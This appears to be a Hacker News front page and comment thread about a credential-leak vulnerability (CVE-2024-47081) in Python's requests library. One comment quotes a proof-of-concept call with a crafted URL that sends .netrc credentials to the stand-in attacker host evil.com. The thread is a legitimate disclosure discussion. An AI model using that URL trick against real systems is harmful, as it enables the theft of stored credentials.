HN Reader

DiffX – Next-Generation Extensible Diff Format (diffx.org)

234 points by todsacerdoti 7h ago 96 comments

Cloud Run GPUs, now GA, makes running AI workloads easier for everyone (cloud.google.com)

23 points by mariuz 1h ago 16 comments

Merlin Bird ID (merlin.allaboutbirds.org)

222 points by twitchard 7h ago 74 comments

Precious Plastic is in trouble (preciousplastic.com)

204 points by diggan 11h ago 126 comments

Ask HN: Has anybody built search on top of Anna's Archive?

136 points by neonate 8h ago 49 comments

A critical look at NetBSD’s installer (eerielinux.wordpress.com)

52 points by jaypatelani 7h ago 12 comments

Consider Knitting (journal.stuffwithstuff.com)

69 points by ingve 4d ago 32 comments

Depot (YC W23) is hiring an enterprise support engineer (UK/EU) (ycombinator.com)

1 points by jacobwg 3h ago 0 comments

Binary Wordle (wordle.chengeric.com)

118 points by eh8 7h ago 58 comments

Show HN: Hacker News historic upvote and score data (hn.dunkirk.sh)

47 points by clacker-o-matic 7h ago 13 comments

Covert Web-to-App Tracking via Localhost on Android (localmess.github.io)

396 points by sebastian_z 22h ago 274 comments

Show HN: Ephe – A minimalist open-source Markdown paper for today (github.com)

103 points by unvalley 11h ago 41 comments

Deep learning gets the glory, deep fact checking gets ignored (rachel.fast.ai)

435 points by chmaynard 12h ago 83 comments

A deep dive into self-improving AI and the Darwin-Gödel Machine (richardcsuwandi.github.io)

135 points by hardmaru 13h ago 38 comments

Decentralization Hidden in the Dark Ages (bionicmosquito.blogspot.com)

8 points by palmfacehn 3h ago 1 comments

What if you could do it all over? (newyorker.com)

6 points by FinnLobsien 3h ago 4 comments

Writing a postmortem: an interview exercise I like (2017) (danielputtick.com)

13 points by wonger_ 3d ago 0 comments

Barrelfish OS Architecture Overview (2013) [pdf] (barrelfish.org)

32 points by peter_d_sherman 8h ago 20 comments

Machine Code Isn't Scary (jimmyhmiller.com)

19 points by surprisetalk 5h ago 7 comments

Show HN: Tiptap AI Agent – Add AI workflows to your text editor in minutes

15 points by philipisik 3h ago 1 comments

Nncp: Ad-hoc friend-to-friend delay-tolerant sneakernet-compatible darknet (nncpgo.org)

19 points by gasull 3d ago 3 comments

New study casts doubt on the likelihood of Milky Way collision with Andromeda (durham.ac.uk)

39 points by layer8 11h ago 29 comments

Bookish Diversions: Reading as Help for Living (millersbookreview.com)

22 points by ingve 3d ago 0 comments

Ask HN: Startup getting spammed with PayPal disputes, what should we do?

47 points by june3739 8h ago 40 comments

Record/Replay Debugging Tutorial (github.com)

4 points by sidkshatriya 3d ago 1 comments

The Small World of English (inotherwords.app)

140 points by michaeld123 19h ago 65 comments

Destination: Jupiter (clarkesworldmagazine.com)

85 points by AndrewLiptak 14h ago 32 comments

Mapping latitude and longitude to country, state, or city (austinhenley.com)

62 points by azhenley 12h ago 28 comments

Brain aging shows nonlinear transitions, suggesting a midlife "critical window" (pnas.org)

218 points by derbOac 10h ago 89 comments

When the sun dies, could life survive on the Jupiter ocean moon Europa? (space.com)

62 points by amichail 15h ago 92 comments

Changing Directions (jacobian.org)

93 points by speckx 16h ago 34 comments

Codex Changelog: agent internet access, voice dictation and update existing PRs (help.openai.com)

3 points by wertyk 3h ago 0 comments

Standard Completions (standardcompletions.org)

30 points by todsacerdoti 3d ago 2 comments

The wake effect: As wind farms expand, some can ‘steal’ each others’ wind (bbc.com)

40 points by JumpCrisscross 3d ago 81 comments

A manager is not your best friend (staysaasy.com)

157 points by thisismytest 8h ago 92 comments

Why is PS3 emulation so fast: RPCS3 optimizations explained [video] (youtube.com)

82 points by alexjplant 7h ago 8 comments

Quarkdown: A modern Markdown-based typesetting system (github.com)

610 points by asicsp 1d ago 254 comments

X's new "encrypted" XChat feature doesn't seem to be any more secure (theregister.com)

49 points by 01-_- 3h ago 51 comments

(On | No) Syntactic Support for Error Handling (go.dev)

348 points by henrikhorluck 18h ago 456 comments

Show HN: AirAP AirPlay server – AirPlay to an iOS Device (github.com)

187 points by neon443 14h ago 27 comments

Show HN: An Alfred workflow to open GCP services and browse resources within (github.com)

51 points by dineshgowda24 14h ago 14 comments

Show HN: Controlling 3D models with voice and hand gestures (github.com)

89 points by getToTheChopin 19h ago 18 comments

Show HN: I wrote a Java decompiler in pure C language (github.com)

159 points by neocanable 22h ago 86 comments

Show HN: Gradle plugin for faster Java compiles (github.com)

30 points by sgammon 14h ago 27 comments

Show HN: Localize React apps without rewriting code (github.com)

81 points by maxpr 16h ago 64 comments

There should be no Computer Art (1971) (dam.org)

81 points by glimshe 1d ago 126 comments

How much do language models memorize? (arxiv.org)

39 points by mhmmmmmm 18h ago 0 comments

An illustrated guide to Amazon VPCs (ducktyped.org)

23 points by egonschiele 3d ago 5 comments

Swift at Apple: Migrating the Password Monitoring Service from Java (swift.org)

219 points by fidotron 17h ago 204 comments

Physicality: The New Age of UI (lux.camera)

6 points by tambourine_man 5h ago 1 comments

CVE-2024-47081: Netrc credential leak in PSF requests library

59 jupenur 18 6/3/2025, 6:39:29 PM seclists.org ↗

Comments (18)

janzer · 11h ago
Given that the actual vulnerability seems relatively niche along with it being such a popular library officially maintained by the Python foundation, the scariest line in the advisory is almost certainly:

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.

Daviey · 10h ago
Well, it's probably just a coincidence, but I literally just spun up a web service that is vulnerable to this: https://isitup.daviey.com/

The code doesn't make any reference to a .netrc, but I happen to have one in ~/.netrc:

  machine localhost
  login *REDACTED*
  password CTF{*REDACTED*}
It's not ideal that requests automatically slurps credentials from ~/.netrc and leaks them, even when my code never references it. It's possible that the netrc is on the same server from a different application, developer debugging environment, or just forgotten about etc.

First one to grab the flag wins, well, nothing. But have fun. I'll keep it online for a couple of weeks, or until the VC money runs out.

dgl · 10h ago 

  Sorry, you have been blocked
  You are unable to access daviey.com
Looks like Cloudflare has decided the whole thing is dodgy. Or doesn't like my IP address...
Daviey · 10h ago
That's really strange... because it seems to be working for some people (already have the first solve). I can't see an issues in CF...

EDIT: I had the security in CF too robust, try now?

woodruffw · 12h ago
Another good example of lax URL parsing/parser differentials being problematic.

That being said, I wonder how big the actual impact here is in practice: how many users actually use .netrc? I’ve been using curl and other network tools for well over a decade and I don’t think I’ve ever used .netrc for site credentials.

w7 · 10h ago
I think it may be in use by tools without people being aware. I decided to check my workstation for it just in case, figuring the file would be empty, or not exist.

Instead it seems to be populated with what seem to be Heroku API and git credentials.

edelbitter · 8h ago
Well then go check if you are for some reason using any of the other surprise features [1], like honoring the CURL_CA_BUNDLE env variable, or not honoring the PROXIES env variable if REQUEST_METHOD is set.

1: https://requests.readthedocs.io/en/latest/api/#requests.Sess...

cozzyd · 9h ago
I have it on my laptop because it's the most convenient way to download datasets from various repositories (e.g. NASA Earth Data).
audiodude · 10h ago
If you, like me, have never heard of a .netrc file...

https://everything.curl.dev/usingcurl/netrc.html

neilv · 8h ago
There might be a funny thing with FTP, in which, if a company is using FTP, it's probably for something important.

(Even if it's a bad idea now, and compromise of it could result in a bad quarter or regulatory action, legacy systems and priorities happen.)

zx8080 · 7h ago
A funny commit message in the root cause (as stated in the linked post) commit:

> Push code review advice from @sigmavirus24

dfedbeef · 7h ago
I feel this
awoimbee · 12h ago
That's some horrible url parsing code...

But honestly urllib sucks:

url.hostname doesn't return the port url.netloc also returns the basic auth part So you have to f"{u.hostname}:{u.port}"

edelbitter · 8h ago
Wait till you see the cPython stdlib email parser..

Any programming language these days should ship a decent rfc5234 API in the standard library, so you do not get these kinds of problems in slightly different fashion for each and every library/program.

pixl97 · 14h ago
Execute the call

>requests.get('http://example.com:@evil.com/')

>Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call

Instead of having a url parse error it appears to drop the : and use the password:domain format.

dcrazy · 14h ago
> The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.

No comments yet